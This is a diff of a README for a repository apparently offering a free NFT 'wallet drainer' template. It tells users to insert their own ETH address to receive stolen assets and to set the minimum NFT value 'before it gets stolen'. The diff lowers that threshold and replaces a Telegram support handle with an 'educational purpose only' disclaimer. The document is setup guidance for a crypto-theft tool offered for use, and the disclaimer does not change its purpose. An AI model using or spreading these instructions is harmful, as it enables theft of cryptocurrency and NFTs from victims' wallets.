pickles-94/FREE-NFT-DRAINER-APPROVEALL-METHOD-TEMPLATE/ApproveAll-Wallet-Drainer-main/README.md

 # 👻 Important :

 Edit lines : ReceiveAddress: "YOUR WALLET", replace YOUR WALLET with your ETH wallet address.
-Line "minValue: 0.2," is the minimum value of a NFT before it gets stolen.
+Line "minValue: 0.1," is the minimum value of a NFT before it gets stolen.
 Example : If you change this value to 1, the script will only steal NFTs that have a value higher to 1.

-To get instant support, contact me on telegram : @nftdrainers
+*** THIS REPOSITORY IS ONLY FOR EDUCATIONAL PURPOSE ***

+Don't ask for any updates, is free.
+Just make the most of it.
+I won't be updating it.

+--